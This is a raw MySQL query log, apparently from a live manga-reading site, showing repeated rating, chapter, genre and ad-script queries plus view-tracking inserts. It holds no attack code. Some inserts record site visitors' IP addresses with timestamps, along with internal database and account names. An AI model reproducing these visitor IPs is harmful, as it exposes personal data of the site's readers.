330648390 Quit 330648391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330648391 Quit 330648392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330648392 Quit 330648393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330648393 Quit 330648394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330648394 Quit 330648395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330648395 Quit 330648396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330648396 Quit 330648397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330648397 Quit 330648398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330648398 Quit 330648399 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330648399 Quit 330648400 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330648400 Quit 330648401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330648401 Quit 330648402 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330648402 Quit 330648403 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330648403 Quit 330648404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330648404 Quit 330648405 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330648405 Quit 330648406 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330648406 Quit 330648407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330648407 Quit 330648408 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330648408 Quit 330648409 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330648409 Quit 330648410 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330648410 Quit 330648411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330648411 Quit 330648412 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330648412 Quit 330648413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330648413 Quit 330648414 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330648414 Quit 330648415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330648415 Quit 330648416 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330648416 Quit 330648417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330648417 Quit 330648418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330648418 Quit 330648419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330648419 Quit 330648420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330648420 Quit 330648421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330648421 Quit 330648422 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330648422 Quit 330648423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330648423 Quit 330648424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330648424 Quit 330648425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330648425 Quit 330648426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330648426 Quit 330648427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330648427 Quit 330648428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330648428 Quit 330648429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330648429 Quit 330648430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330648430 Quit 330648431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330648431 Quit 330648432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330648432 Quit 330648433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330648433 Quit 330648434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330648434 Quit 330648435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330648435 Quit 330648436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330648436 Quit 330648437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330648437 Quit 330648438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330648438 Quit 330648439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330648439 Quit 330648440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330648440 Quit 330648441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330648441 Quit 330648442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330648442 Quit 330648443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330648443 Quit 330648444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330648444 Quit 330648445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330648445 Quit 330648446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330648446 Quit 330648447 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330648447 Quit 330648448 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330648448 Quit 330648449 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330648449 Quit 330648450 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330648450 Quit 330648451 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330648451 Quit 330648452 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330648452 Quit 330648453 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330648453 Quit 330648454 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330648454 Quit 330648455 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330648455 Quit 330648456 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330648456 Quit 330648457 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330648457 Quit 330648458 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330648458 Quit 330648459 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330648459 Quit 330648460 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330648460 Quit 330648461 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330648461 Quit 330648462 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330648462 Quit 330648463 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330648463 Quit 330648464 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330648464 Quit 330648465 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330648465 Quit 330648466 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330648466 Quit 330648467 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330648467 Quit 330648468 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330648468 Quit 330648469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330648469 Quit 330648470 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330648470 Quit 330648471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330648471 Quit 330648472 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330648472 Quit 330648473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330648473 Quit 330648474 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330648474 Quit 330648475 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330648475 Quit 330648476 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330648476 Quit 330648477 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330648477 Quit 330648478 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330648478 Quit 330648479 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330648479 Quit 330648480 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330648480 Quit 330648481 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330648481 Quit 330648482 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330648482 Quit 330648483 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330648483 Quit 330648484 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330648484 Quit 330648485 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330648485 Quit 330648486 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330648486 Quit 330648487 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330648487 Quit 330648488 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330648488 Quit 330648489 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330648489 Quit 260225 19:28:53 330648490 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330648490 Quit 330648491 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330648491 Quit 330648492 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330648492 Quit 330648493 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330648493 Quit 330648494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330648494 Quit 330648495 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330648495 Quit 330648496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330648496 Quit 330648497 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330648497 Quit 330648498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648498 Quit 330648499 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648499 Quit 330648141 Quit 330648500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648500 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330648500 Quit 330648501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648501 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330648501 Quit 330648502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648502 Quit 330648503 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648503 Quit 330648237 Quit 330648504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648504 Quit 330648505 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648505 Quit 330648506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648506 Quit 330648507 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648507 Quit 330648508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648508 Quit 330648509 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648509 Quit 330648510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648510 Quit 330648511 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648511 Quit 330648512 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648512 Quit 330648513 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1853' and m.active = 1 330648513 Quit 330648514 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648514 Query select * FROM chapters where id = '1853' 330648515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648515 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330648514 Quit 330648515 Quit 330648516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648516 Query Update chapters set view=view+1 where id = '1853' 330648516 Quit 330648517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648517 Query select * FROM chapters where id = '1853' 330648517 Quit 330648518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648518 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1853' and m.active = 1 330648518 Quit 330648519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648519 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '1853', '192.12.147.69', 'mangaberri.com', '2026-02-26 03:28:53', '2026-02-26 03:28:53') 330648519 Quit 330648520 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648520 Query select * FROM chapter_images where chapter_id = '1853' 330648520 Quit 330648521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648521 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330648522 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648522 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330648521 Quit 330648522 Quit 330648523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648523 Quit 330648524 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330648524 Quit 330648525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648526 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648525 Quit 330648526 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648526 Quit 330648527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648528 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648528 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648527 Quit 330648528 Quit 330648529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648530 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648529 Quit 330648530 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330648530 Quit 330648531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648532 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648531 Quit 330648532 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5236' and m.active = 1 330648532 Quit 330648533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648533 Query select * FROM chapters where id = '5236' 330648533 Quit 330648534 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648534 Query select * FROM chapters where manga_id = '35' order by display_priority ASC, id desc 330648534 Quit 330648535 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648535 Query Update chapters set view=view+1 where id = '5236' 330648535 Quit 330648536 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648536 Query select * FROM chapters where id = '5236' 330648537 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648536 Quit 330648537 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5236' and m.active = 1 330648537 Quit 330648538 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648538 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '5236', '75.72.250.102', 'mangaberri.com', '2026-02-26 03:28:53', '2026-02-26 03:28:53') 330648538 Quit 330648539 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648539 Query select * FROM chapter_images where chapter_id = '5236' 330648539 Quit 330648540 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648540 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330648540 Quit 330648541 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648541 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Fantasy%' OR genres like '%Military%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330648541 Quit 330648542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330648543 